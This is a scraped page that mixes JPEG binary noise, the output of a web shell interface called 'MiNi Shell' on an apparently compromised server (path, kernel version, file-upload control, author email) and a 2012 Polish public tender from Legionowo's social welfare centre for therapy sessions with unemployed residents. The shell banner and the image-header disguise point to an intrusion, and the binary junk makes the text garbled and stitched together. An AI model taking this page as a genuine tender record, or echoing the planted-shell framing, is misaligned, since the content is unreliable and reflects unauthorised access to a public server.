JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120820/179319-N-2012.html

<p class="kh_header"><b>Legionowo: Świadczenie usług - zajęcia aktywizujące z zakresu grupowego i indywidualnego wsparcia terapeutycznego
w ramach projektu  Złap swój sukces! współfinansowanego ze środków Unii Europejskiej w ramach 
Europejskiego Funduszu Społecznego Numer i nazwa Priorytetu: VII. Promocja integracji społecznej
Numer i nazwa Działania: 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznemu
Numer i nazwa Poddziałania: 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym</b><br>
<b>Numer ogłoszenia: 179319 - 2012; data zamieszczenia: 20.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Legionowie , Aleja 3 Maja 28, 05-120 Legionowo, woj. mazowieckie, tel. 22 774 08 66, faks 22 774 08 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opslegionowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług - zajęcia aktywizujące z zakresu grupowego i indywidualnego wsparcia terapeutycznego
w ramach projektu  Złap swój sukces! współfinansowanego ze środków Unii Europejskiej w ramach 
Europejskiego Funduszu Społecznego Numer i nazwa Priorytetu: VII. Promocja integracji społecznej
Numer i nazwa Działania: 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznemu
Numer i nazwa Poddziałania: 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca zorganizowanie i przeprowadzenie zajęć aktywizujących z zakresu grupowego i indywidualnego wsparcia terapeutycznego dla uczestników projektu realizowanego przez Ośrodek Pomocy Społecznej w Legionowie pt. Złap swój sukces! w ramach Programu Operacyjnego Kapitał Ludzki (Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym) współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
1. Cykl zajęć z terapeutą obejmuje zajęcia grupowe i indywidualne dla 70 osób wskazanych przez Ośrodek Pomocy Społecznej w Legionowie. Uczestnikami zajęć będą bezrobotni mieszkańcy miasta Legionowo w wieku aktywności zawodowej (kobiety i mężczyźni), korzystający z systemu pomocy społecznej, dodatkowo borykający się z problemami towarzyszącymi bezrobociu.
2. Zajęcia z terapeutą obejmą: 20 osób (2 grupy po 10 osób) z problemami opiekuńczo-wychowawczymi, 10 osób (1 grupa po 10 osób) z problemem przemocy (ofiary i/lub sprawcy), 10 osób (1 grupa po 10 osób) z trudnościami adaptacyjnymi po opuszczeniu zakładu karnego, 10 osób (1 grupa po 10 osób) z uzależnieniami, 20 osób (2 grupy po 10 osób) długotrwale bezrobotnych - łącznie 7 grup po 10 osób.
3. Liczba godzin do zrealizowania: 
-  252 godzin zajęć grupowych tj. po 36 godzin dla każdej grupy,
-  700 godzin zajęć indywidualnych tj. po 10 godzin z każdym uczestnikiem projektu.
Uwaga! 
Zamawiający wymaga przeprowadzenia 144 godzin zajęć grupowych tj. po 36 godzin dla 4 (czterech) grup (po 10 osób) uczestników projektu oraz 400 godzin zajęć indywidualnych tj. po 10 godzin dla każdego uczestnika z 4 (czterech) grup w terminie do dnia 14.12.2012 roku.
Uwaga!
Szczegółowe harmonogramy zajęć dla poszczególnych grup oraz zajęć indywidualnych Zamawiający ustali w porozumieniu z Wykonawcą po podpisaniu umowy.
4. Zajęcia będą się odbywały w dni powszednie (robocze) od poniedziałku do piątku, z pominięciem sobót, niedziel i świąt w godzinach 8.00 - 16.00 (w przypadku zajęć indywidualnych, w uzasadnionych przypadkach do godz. 18.00) w pomieszczeniach udostępnionych przez Zamawiającego w Klubie Integracji Społecznej w Legionowie przy ul. Sowińskiego 3 oraz w siedzibie zamawiającego, tj. w pomieszczeniach Ośrodka Pomocy Społecznej przy ul. Alei 3 Maja 28 w Legionowie.
5. Godzina zegarowa zajęć grupowych liczy 60 min. i obejmuje zajęcia liczące 45 min. oraz przerwę liczącą średnio 15 min., przy czym długość przerw może być ustalana w sposób elastyczny.
Godzina zegarowa zajęć indywidualnych liczy 60 min. Czas trwania zajęć grupowych nie powinien przekraczać 6 godzin zegarowych w ciągu jednego dnia zajęć.
6. Wykonawca zobowiązuje się zapewnić profesjonalną, wykwalifikowaną kadrę gwarantującą prawidłową organizację i przeprowadzenie zajęć.
7. Zamawiający dopuszcza możliwość - po uprzednim zawiadomieniu Zamawiającego i uzyskaniu jego zgody - zmiany osób przeprowadzających zajęcia. W takim przypadku Wykonawca powinien dostarczyć Zamawiającemu dokumenty potwierdzające spełnienie przez te osoby warunków udziału w specyfikacji istotnych warunków zamówienia.
8. W terminie 5 dni przed przystąpieniem do realizacji zajęć Wykonawca przedłoży Zamawiającemu opracowane szczegółowe programy zajęć grupowych do akceptacji.
9. Szczegółowe programy zajęć, o których mowa w ust. 8 powinny być opracowane odrębnie dla każdej z grup osób wymienionych w § 3 ust.2 niniejszej SIWZ. Programy powinny określać m.in. czas trwania i sposób organizacji zajęć, cele zajęć, plan nauczania określający tematy zajęć oraz ich wymiar (część teoretyczna i praktyczna), metody i techniki prowadzenia zajęć, wykaz literatury. Minimalna wymagana treść powinna obejmować m.in. tematy:
9.1. dla grupy osób z problemami opiekuńczo- wychowawczymi:
1) praca nad relacjami z rodziną, w tym z dziećmi,
2) kształtowanie właściwych postaw rodzicielskich i umiejętności wychowawczych,
3) nauka komunikacji na linii rodzic - dziecko,
4) omówienie problemów wychowawczych towarzyszących różnym etapom rozwoju dziecka,
9.2. dla grupy osób z problemem przemocy:
1) praca nad samooceną oraz wychodzeniem z bezradności,
2) motywacją do zmiany własnej sytuacji życiowej,
3) radzenie sobie z emocjami,
4) trening zastępowania agresji,
5) nauka właściwej komunikacji interpersonalnej,
9.3 dla grupy osób z trudnościami adaptacyjnymi po opuszczeniu zakładu karnego:
1) praca nad adaptacją do środowiska,
2) motywacja do poszukiwania pracy,
3) nauka zachowań społecznie akceptowanych,
4) praca nad samooceną,
9.4. dla grupy osób z uzależnieniem:
1) terapia i profilaktyka uzależnień,
2) praca nad relacjami z rodziną i otoczeniem (kształtowanie prawidłowych postaw),
3) praca nad samooceną oraz poznaniem samego siebie,
4) motywacja do zmiany własnej sytuacji życiowej.
9.5. dla grupy osób długotrwale bezrobotnych: 
1) budowanie poczucia własnej wartości, 
2) praca nad samooceną,
3) praca nad motywacją do poszukiwania pracy i zmiany własnej sytuacji życiowej, 
4) kształtowanie właściwych umiejętności interpersonalnych,
10. Wykonawca ponadto:
1)  przeprowadzi diagnozę umiejętności miękkich uczestników za pomocą posiadanych testów dostępnych dla terapeutów (m.in. badających poziom stresu, samoocenę, umiejętności komunikacyjne),
2)  opracuje opinie terapeutyczne poszczególnych uczestników (w formie ustnej) oraz omówi je z poszczególnymi uczestnikami w ramach zajęć indywidualnych. Na prośbę uczestnika sporządzi dla niego opinię w formie pisemnej.
11. Zamawiający nie dopuszcza możliwości prowadzenia zajęć na odległość.
12. Zajęcia grupowe powinny odbywać się w grupach liczących maksymalnie 10 osób.
13. Wykonawca wskaże opiekuna zajęć, czyli osobę odpowiedzialną z ramienia Wykonawcy za organizację zajęć oraz kontakty z uczestnikami zajęć oraz Zamawiającym.
14. Wykonawca w ofercie cenowej uwzględnia cenę za maksymalną do przeprowadzenia ilość godzin zajęć.
15. Zamawiający zastrzega sobie możliwość zmniejszenia liczby osób w konsekwencji godzin zajęć.
16. Wykonawca zapewni oryginał materiałów dydaktycznych, na co najmniej 1 dzień roboczy przed planowanymi zajęciami, które Zamawiający ma prawo powielić w liczbie równej uczestnikom zajęć. Jeden komplet materiałów Zamawiający zatrzyma do celów dokumentacyjnych.
17. Wykonawca nie uwzględnia catteringu.
18. Wykonawca zapewni możliwość wglądu przez Zamawiającego do prowadzonej w ramach zajęć dokumentacji oraz umożliwi Zamawiającemu wizytację zajęć (bez uzgodnienia z Wykonawcą terminu wizytacji) w tym wykonania dokumentacji fotograficznej na potrzeby dokumentacyjne projektu.
19. Wykonawca w ramach usługi zobowiązany jest ponadto do:
1)  informowania przed każdymi zajęciami uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
2)  niezwłocznego zawiadamiania Zamawiającego o nieobecności któregokolwiek uczestnika, przerwaniu lub rezygnacji uczestnika z zajęć oraz innych sytuacjach mających wpływ na prawidłowy przebieg zajęć i realizację umowy,
3)  przygotowania i wydania uczestnikom, którzy ukończyli zajęcia zaświadczeń informujących o uczestnictwie w zajęciach współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, oznakowanych zgodnie z wytycznymi dotyczącymi oznakowywania projektów w ramach POKL 2007 - 2013. Treść zaświadczenia zostanie uzgodniona z Zamawiającym.
4)  prowadzenia dokumentacji zajęć w tym przekazanych przez Zamawiającego: dziennika zajęć, list obecności uczestników zajęć, list potwierdzających korzystanie uczestników zajęć z cateringu,
5)  prowadzenia zajęć zgodnie z przepisami bhp w tym zakresie,
6)  do promocji projektu poprzez oznaczenie środków i materiałów dydaktycznych oraz wszelkich opracowanych na potrzebę prawidłowej realizacji zadania materiałów logo Unii Europejskiej - Europejski Fundusz Społeczny, logo Programu Operacyjnego Kapitał Ludzki Narodowa Strategia Spójności zgodnie oraz logo Ośrodka Pomocy Społecznej w Legionowie jako realizatora projektu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki i zachowaniem warunków określonych we wzorze umowy.
7)  dokonania wpisu o szkoleniach na stronie www.inwestycjawkadry.info.pl
8)  przekazania Zamawiającemu w ciągu 5 dni od daty zakończenia zajęć z każdą z poszczególnych grup kopii poświadczonych za zgodność z oryginałem zaświadczeń, o których mowa w § 3 ust.19 pkt 3 specyfikacji istotnych warunków zamówienia wraz z imienną listą potwierdzającą ich odbiór,
9)  przekazania Zamawiającemu w ciągu 5 dni od daty zakończenia zajęć z każdą z poszczególnych grup zaświadczenia, dla każdego uczestnika projektu, potwierdzającego przeprowadzenie badań, o których mowa w § 3 ust. 10 specyfikacji istotnych warunków zamówienia zawierającego: imię i nazwisko uczestnika projektu, rodzaj przeprowadzonych badań (z podaniem wykorzystanych narzędzi badawczych), rodzaj omówionych badań oraz informacją czy została wydana uczestnikowi w formie pisemnej opinia terapeutyczna..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie przez Wykonawcę zgodnie z art.20 ust.1 ustawy z dnia 20 kwietnia 2004 r o promocji zatrudnienia i instytucjach rynku pracy aktualnego wpisu instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca wykaże, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 3 usługi polegające na zorganizowaniu zajęć grupowych z terapeutą, każda w wymiarze co najmniej 30 godzin i każda dla co najmniej grupy 8 osobowej odpowiadających swoim rodzajem przedmiotowemu zamówieniu.
2. Wykonawca wykaże, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował usługi polegające na zorganizowaniu zajęć indywidualnych z terapeutą łącznie 350 godzin odpowiadających swoim rodzajem przedmiotowemu zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie co najmniej 2 terapeutami, z wykształceniem co najmniej wyższym magisterskim z zakresu psychologii lub pedagogiki, posiadającymi uprawnienia do prowadzenia zajęć terapeutycznych, z co najmniej rocznym doświadczeniem w prowadzeniu zajęć wsparcia terapeutycznego, którzy w ciągu ostatniego roku, przed upływem terminu składania ofert przeprowadzili co najmniej 3 zajęcia o tematyce zbliżonej do przedstawionej w § 3 niniejszej SIWZ** każde dla grupy co najmniej 8 osobowej oraz co najmniej 70 godzin w ramach zajęć indywidualnych każdy.
**termin tematyka zbliżona oznacza, że prowadzone szkolenie zawierało co najmniej 2 tematy z tematów wyszczególnionych w § 3 ust. 9 niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie wykonawcy o posiadaniu aktualnego wpisu instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1) zmniejszenia wynagrodzenia określonego w § 9,
2. Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących warunkach:
ad pkt 1) - zmniejszenie wynagrodzenia w przypadku uczestniczenia w zajęciach indywidualnych mniejszej liczby uczestników niż określona w § 3 ust.1 o cenę brutto za każda niezrealizowaną godzinę zajęć indywidualnych,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opalegionowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej
ul Aleja 3 Maja 28
05-120 Legionowo
pokój 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2012 godzina 11:00, miejsce: Ośrodek Pomocy Społecznej
ul Aleja 3 Maja 28
05-120 Legionowo
w Sekretariacie, pokój 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  Złap swój sukces! współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Numer i nazwa Priorytetu: VII. Promocja integracji społecznej
Numer i nazwa Działania: 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznemu
Numer i nazwa Poddziałania: 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com